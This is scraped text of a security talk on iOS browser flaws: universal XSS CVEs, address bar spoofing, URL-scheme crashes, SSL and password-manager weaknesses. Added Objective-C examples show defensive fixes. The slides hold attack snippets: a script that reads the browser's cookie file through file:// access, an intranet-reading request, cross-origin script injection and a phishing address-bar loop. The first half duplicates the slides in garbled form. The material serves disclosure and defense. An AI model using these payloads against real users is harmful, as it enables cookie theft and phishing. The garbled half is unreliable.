CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 28: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/28.jpg)
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:href]
CVE-2012-2899 Chrome UXSS
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:@"…" baseURL:nil]
CVE-2012-2899 Chrome UXSS
• For baseURL = nil, UIWebView loads the applewebdata:// origin. Same as file://: no same-origin policy, access to any web origin and to local files
CVE-2012-2899 Chrome UXSS
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>')
• applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)
Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:[NSURL …"about:blank"]]
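The Yandex bug above (origin checked at window.open(), never again) and the Chrome bug (written HTML rendered in the target's origin, or in applewebdata:// when baseURL is nil) have one native-side fix in a UIWebView-era browser: recompute both tabs' origins at the moment of every bridge command, and render cross-tab document.write() content with an about:blank base. The following is an added example, not code from the slides or from any of the browsers discussed; it assumes a one-UIWebView-per-tab browser with a JSON command bridge, and TabBridge, tabsByID, handleDocumentWriteFrom:targetID:html: and WebOriginOfWebView are this example's own names.

```objectivec
// Added example (not from the slides or from any browser's real bridge): a native
// handler for a cross-tab window.document.write command in a UIWebView-based browser.
// It re-derives both tabs' origins on every command, not only at window.open(), and
// renders the HTML with an about:blank base URL instead of evaluating script inside
// the target's origin. TabBridge, tabsByID and handleDocumentWriteFrom:... are this
// example's own names.
#import <UIKit/UIKit.h>

// Web origin (scheme://host:port) of the top document a UIWebView currently shows.
// Returns nil for anything without a web origin (nothing loaded, about:blank,
// applewebdata://, file://); nil must never compare equal to anything, itself included.
static NSString *WebOriginOfWebView(UIWebView *webView) {
    NSURL *url = webView.request.mainDocumentURL;
    NSString *scheme = url.scheme.lowercaseString;
    if (url.host.length == 0) return nil;
    if (![scheme isEqualToString:@"http"] && ![scheme isEqualToString:@"https"]) return nil;
    NSInteger port = url.port ? url.port.integerValue
                              : ([scheme isEqualToString:@"https"] ? 443 : 80);
    return [NSString stringWithFormat:@"%@://%@:%ld",
            scheme, url.host.lowercaseString, (long)port];
}

@interface TabBridge : NSObject
@property (nonatomic, strong) NSMutableDictionary<NSNumber *, UIWebView *> *tabsByID;
@end

@implementation TabBridge

- (instancetype)init {
    if ((self = [super init])) {
        _tabsByID = [NSMutableDictionary dictionary];
    }
    return self;
}

// Handles a {"command":"window.document.write","target":<id>,"html":"..."} message
// sent by the page loaded in `caller`. Returns NO when the command is dropped.
- (BOOL)handleDocumentWriteFrom:(UIWebView *)caller
                       targetID:(NSNumber *)targetID
                           html:(NSString *)html {
    UIWebView *target = self.tabsByID[targetID];
    if (target == nil) return NO;

    // Checked at write time, on the main thread, immediately before acting. A child
    // that was same-origin at window.open() but has been redirected since (the
    // CVE-2013-7197 pattern) now has a different origin and fails here.
    NSString *callerOrigin = WebOriginOfWebView(caller);
    NSString *targetOrigin = WebOriginOfWebView(target);
    if (callerOrigin == nil || targetOrigin == nil ||
        ![callerOrigin isEqualToString:targetOrigin]) {
        return NO;
    }

    // Not: [target stringByEvaluatingJavaScriptFromString:@"document.write(...)"],
    // which would run the caller's HTML inside the target's origin. Loading it with
    // an about:blank base keeps the written document out of every web origin, and a
    // nil base would put it in applewebdata:// (the CVE-2012-2899 pattern).
    [target loadHTMLString:html baseURL:[NSURL URLWithString:@"about:blank"]];
    return YES;
}

@end
```

The origin comparison and the load happen in the same main-thread turn, so a navigation the target starts afterwards is simply seen by the next command's check. Guessable target IDs (the Mercury "cross-frame forgery" slide) are not fixed by this check alone; the bridge still has to hand out unpredictable IDs and only to the tab that opened the window.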
Safe cross-tab document.write
• iOS 8: use the WKWebView UIDelegate method webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com"] → nil
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com"), NULL) → NULL
• Downloads opened directly from file://
Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://'+location.hostname); w.document.write('custom SOP implementation')
Content-Type
• text/plain → HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream → HTML
• application/other, filename .html
JS without Same-Origin-Policy
<script>a = document.location.href.split('/'); if(a[0]==='file:') path = 'file:///'+a[3]+'/'+a[4]+'/'+a[5]+'/'+a[6]+'/'+a[7]; path = path+'/Library/Cookies/Cookies.binarycookies'; x = new XMLHttpRequest(); x.open('GET', path, false); x.send(); alert(x.responseText);</script>
JS without Same-Origin-Policy
<script>x = new XMLHttpRequest(); x.open('GET', 'https://your.intranet/', false); x.send(); alert(x.responseText);</script>
Challenge: Hijack password autofill
Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header, HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
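The two iOS 8 recommendations above, popups created through the WKWebView UIDelegate and downloaded HTML opened with script disabled and an about:blank base, fit in one small view controller. This is an added example, not code from the slides or from any browser; SafeBrowserViewController, popups and openDownloadedHTML: are this example's own names.

```objectivec
// Added example (not from the slides): a WKWebView-based browser that lets WebKit own
// popup windows and opens downloaded HTML files with script disabled. The class and
// method names are this example's own.
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>

@interface SafeBrowserViewController : UIViewController <WKUIDelegate>
@property (nonatomic, strong) WKWebView *webView;
@property (nonatomic, strong) NSMutableArray<WKWebView *> *popups;
@end

@implementation SafeBrowserViewController

- (void)viewDidLoad {
    [super viewDidLoad];
    self.popups = [NSMutableArray array];
    WKWebViewConfiguration *config = [[WKWebViewConfiguration alloc] init];
    self.webView = [[WKWebView alloc] initWithFrame:self.view.bounds configuration:config];
    self.webView.UIDelegate = self;
    [self.view addSubview:self.webView];
}

// window.open() from page script arrives here. The popup must be created with the
// configuration WebKit passes in (it carries the opener relationship), so the later
// w.document.write() is checked by WebKit's own same-origin policy rather than by a
// bolted-on JavaScript bridge. Returning nil cancels the popup instead.
- (WKWebView *)webView:(WKWebView *)webView
createWebViewWithConfiguration:(WKWebViewConfiguration *)configuration
   forNavigationAction:(WKNavigationAction *)navigationAction
        windowFeatures:(WKWindowFeatures *)windowFeatures {
    WKWebView *popup = [[WKWebView alloc] initWithFrame:self.view.bounds
                                          configuration:configuration];
    popup.UIDelegate = self;
    [self.popups addObject:popup];
    [self.view addSubview:popup];
    return popup;
}

// A downloaded HTML file (e.g. one served with Content-Disposition: attachment) is
// shown in its own view with JavaScript off and an about:blank base URL, so it can
// neither run script nor inherit the applewebdata:// or file:// origin of the sandbox.
- (void)openDownloadedHTML:(NSString *)html {
    WKWebViewConfiguration *config = [[WKWebViewConfiguration alloc] init];
    config.preferences.javaScriptEnabled = NO;
    WKWebView *viewer = [[WKWebView alloc] initWithFrame:self.view.bounds
                                           configuration:config];
    [viewer loadHTMLString:html baseURL:[NSURL URLWithString:@"about:blank"]];
    [self.view addSubview:viewer];
}

@end
```

WebKit raises an exception if the returned web view was not created with the configuration it passed in, which is what forces the popup into the opener's process pool. WKPreferences.javaScriptEnabled is the iOS 8 API named on the slide; it was deprecated in iOS 14 in favour of WKWebpagePreferences.allowsContentJavaScript, which does the same job per navigation.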
Popups & URL handling
Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com"><iframe src="merc://example.com"> etc. bypass all popup blockers anyway…
URI schemes
Native (WebKit) / Application (bolted-on); Bridge (internal) / Registered (external)
• scheme://download/https://secure.tld/victim/data, scheme://download/http://attacker.tld/README.html
• scheme://add-filter?url=
CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a Null Pointer Dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example: Opera Coast <script>document.location = 'http://%5c'</script>
Opera Coast
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
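The crash above is CFURLCopyPath being handed the NULL that CFURLCreateWithString returned for an unparsable string. The fix on the browser side is a NULL check between the two calls, shown here as an added example (not the slides' code, and not any browser's); PathOfURLUnchecked and PathOfURL are this example's own names.

```objectivec
// Added example (not from the slides): URL parsing guarded against the NULL result that
// CFURLCreateWithString returns for strings it cannot parse, so the NULL never reaches
// CFURLCopyPath or any other CFURL accessor. Function names are this example's own.
#import <Foundation/Foundation.h>
#import <CoreFoundation/CoreFoundation.h>

// The crashing pattern: the return value of CFURLCreateWithString is used unchecked.
// For input such as "http://%" the result is NULL and CFURLCopyPath dereferences it,
// which is the EXC_BAD_ACCESS at address 0x00000000 inside CFURLCopyPath shown above.
static NSString *PathOfURLUnchecked(NSString *urlString) {
    CFURLRef url = CFURLCreateWithString(kCFAllocatorDefault,
                                         (__bridge CFStringRef)urlString, NULL);
    CFStringRef path = CFURLCopyPath(url);   // crashes when url == NULL
    CFRelease(url);
    return CFBridgingRelease(path);
}

// Hardened: NULL from the parser means "not a URL". The caller gets nil and can show
// an error page or drop the navigation; no CFURL function ever sees the NULL.
static NSString *PathOfURL(NSString *urlString) {
    CFURLRef url = CFURLCreateWithString(kCFAllocatorDefault,
                                         (__bridge CFStringRef)urlString, NULL);
    if (url == NULL) return nil;
    CFStringRef path = CFURLCopyPath(url);   // may itself be NULL for an empty path
    CFRelease(url);
    return path ? CFBridgingRelease(path) : @"";
}

int main(int argc, char *argv[]) {
    @autoreleasepool {
        // Constructed inputs: one ordinary URL and the percent-encoding cases from
        // the slide. Which of them the parser rejects varies between Foundation
        // versions, which is exactly why the NULL check cannot be skipped.
        NSArray<NSString *> *inputs = @[ @"http://example.com/a/b",
                                         @"http://%", @"http://%5", @"http://%5c" ];
        for (NSString *s in inputs) {
            NSString *path = PathOfURL(s);
            NSLog(@"%@ -> %@", s, path ?: @"rejected (not a URL)");
        }
    }
    return 0;
}
```

The same rule applies one level up: [NSURL URLWithString:] returns nil for the same strings, and a nil NSURL silently turns into a NULL CFURLRef at the first bridge cast, so the check belongs wherever user-controlled text (location assignments, href rewriting, scheme handlers) first becomes a URL object.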
• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">
SSL & password managers
SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14 of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)
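The three failure modes on the slide (silent acceptance, main-domain-only validation, and an "accept self-signed cert" option that leaks to other hosts) all come from how a browser answers server-trust challenges. The following is an added example, not code from the slides or from any browser; it assumes the browser's own network layer is NSURLSession with a session-level delegate, and BrowserSessionDelegate, acceptedLeafCerts and LeafCertificateData are this example's own names.

```objectivec
// Added example (not from the slides): server-trust handling for a browser's own
// network layer, assumed here to be NSURLSession with a session-level delegate. The
// class name and the acceptedLeafCerts table are this example's own.
#import <Foundation/Foundation.h>
#import <Security/Security.h>

@interface BrowserSessionDelegate : NSObject <NSURLSessionDelegate>
// host -> DER bytes of the one leaf certificate the user explicitly accepted for it
@property (nonatomic, strong) NSMutableDictionary<NSString *, NSData *> *acceptedLeafCerts;
@end

@implementation BrowserSessionDelegate

- (instancetype)init {
    if ((self = [super init])) {
        _acceptedLeafCerts = [NSMutableDictionary dictionary];
    }
    return self;
}

static NSData *LeafCertificateData(SecTrustRef trust) {
    if (trust == NULL || SecTrustGetCertificateCount(trust) < 1) return nil;
    SecCertificateRef leaf = SecTrustGetCertificateAtIndex(trust, 0);
    return CFBridgingRelease(SecCertificateCopyData(leaf));
}

// Runs for every TLS connection the session opens: main document, subresources,
// redirects and frames alike. Validating only the main domain (the Opera Coast < 3.02
// behaviour on the slide) would leave every other host on the page unchecked.
- (void)URLSession:(NSURLSession *)session
didReceiveChallenge:(NSURLAuthenticationChallenge *)challenge
 completionHandler:(void (^)(NSURLSessionAuthChallengeDisposition,
                             NSURLCredential *))completionHandler {
    NSURLProtectionSpace *space = challenge.protectionSpace;
    if (![space.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust]) {
        completionHandler(NSURLSessionAuthChallengePerformDefaultHandling, nil);
        return;
    }

    // The "silently accepted" pattern: trusting whatever certificate the server
    // presented, for any host, with no evaluation and no user involvement.
    //   completionHandler(NSURLSessionAuthChallengeUseCredential,
    //                     [NSURLCredential credentialForTrust:space.serverTrust]);

    // Explicit user exception: only the exact leaf certificate the user accepted, and
    // only for the host it was accepted on. Any other host, or a different certificate
    // on the same host, still goes through the system evaluation below.
    NSData *leaf = LeafCertificateData(space.serverTrust);
    NSData *accepted = self.acceptedLeafCerts[space.host.lowercaseString];
    if (leaf != nil && accepted != nil && [leaf isEqual:accepted]) {
        completionHandler(NSURLSessionAuthChallengeUseCredential,
                          [NSURLCredential credentialForTrust:space.serverTrust]);
        return;
    }

    // Default: the system evaluates the chain (trusted root, hostname, validity). An
    // invalid certificate fails the load, and only then may the UI offer the per-host
    // exception above; it is never granted automatically.
    completionHandler(NSURLSessionAuthChallengePerformDefaultHandling, nil);
}

@end
```

The exception table is keyed by host and compared against the full DER of the leaf, so accepting a self-signed certificate for one intranet host does not make any other certificate, or any other host, pass. SecTrustGetCertificateAtIndex was the API of the period; on iOS 15 and later SecTrustCopyCertificateChain returns the same certificates as an array.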
Password managers
• JavaScript with privileges of the top frame → passwords not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain but not always the URL scheme (https vs http)
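The last two bullets describe an autofill check that matches on domain only. The native-side check a browser should run before handing a saved password to a page compares the full web origin (scheme, host and port) and refuses subframes outright, since the injected JavaScript cannot tell a subframe's origin from the top document's. This is an added example, not code from the slides or from any browser; SavedCredential, ShouldAutofill and EffectivePort are this example's own names and the saved entry and test URLs are constructed.

```objectivec
// Added example (not from the slides): the native-side eligibility check run before a
// saved password is handed to the page. Class and function names are this example's own.
#import <Foundation/Foundation.h>

@interface SavedCredential : NSObject
@property (nonatomic, copy) NSString *scheme;   // "https"
@property (nonatomic, copy) NSString *host;     // "accounts.google.com"
@property (nonatomic, assign) NSInteger port;   // 443
@end
@implementation SavedCredential
@end

static NSInteger EffectivePort(NSURL *url) {
    if (url.port != nil) return url.port.integerValue;
    return [url.scheme.lowercaseString isEqualToString:@"https"] ? 443 : 80;
}

// Fill only when scheme, host and port (the web origin) all match the saved entry:
// a credential saved on https is never handed to an http page on the same host, a
// different port is a different origin, and nothing is filled into subframes, because
// the injected JavaScript runs with the top frame's privileges and cannot tell a
// subframe's origin from the top document's.
BOOL ShouldAutofill(SavedCredential *saved, NSURL *pageURL, BOOL isMainFrame) {
    if (!isMainFrame || pageURL.host.length == 0) return NO;
    NSString *scheme = pageURL.scheme.lowercaseString;
    if (![scheme isEqualToString:@"https"] && ![scheme isEqualToString:@"http"]) return NO;
    if (![scheme isEqualToString:saved.scheme.lowercaseString]) return NO;
    if ([pageURL.host caseInsensitiveCompare:saved.host] != NSOrderedSame) return NO;
    return EffectivePort(pageURL) == saved.port;
}

int main(int argc, char *argv[]) {
    @autoreleasepool {
        // Constructed saved entry and test pages.
        SavedCredential *saved = [[SavedCredential alloc] init];
        saved.scheme = @"https";
        saved.host = @"accounts.google.com";
        saved.port = 443;

        NSURL *ok        = [NSURL URLWithString:@"https://accounts.google.com/ServiceLogin"];
        NSURL *http      = [NSURL URLWithString:@"http://accounts.google.com/ServiceLogin"];
        NSURL *port      = [NSURL URLWithString:@"https://accounts.google.com:8443/"];
        NSURL *lookalike = [NSURL URLWithString:@"https://accounts.google.com.attacker.tld/"];

        NSCAssert(ShouldAutofill(saved, ok, YES) == YES, @"same origin, main frame");
        NSCAssert(ShouldAutofill(saved, http, YES) == NO, @"scheme downgrade");
        NSCAssert(ShouldAutofill(saved, port, YES) == NO, @"different port");
        NSCAssert(ShouldAutofill(saved, lookalike, YES) == NO, @"host suffix is not a match");
        NSCAssert(ShouldAutofill(saved, ok, NO) == NO, @"never into a subframe");
    }
    return 0;
}
```

The isMainFrame flag comes from the web view, not from the page: in UIWebView's webView:shouldStartLoadWithRequest:navigationType: a main-frame load is one where request.URL equals request.mainDocumentURL, and in WKWebView it is WKNavigationAction.targetFrame.isMainFrame. The saving side needs the same origin rule, otherwise a page can still store a credential under another domain and the fill check will later honour it.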
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/
Questions?
lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you!
![Page 31: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/31.jpg)
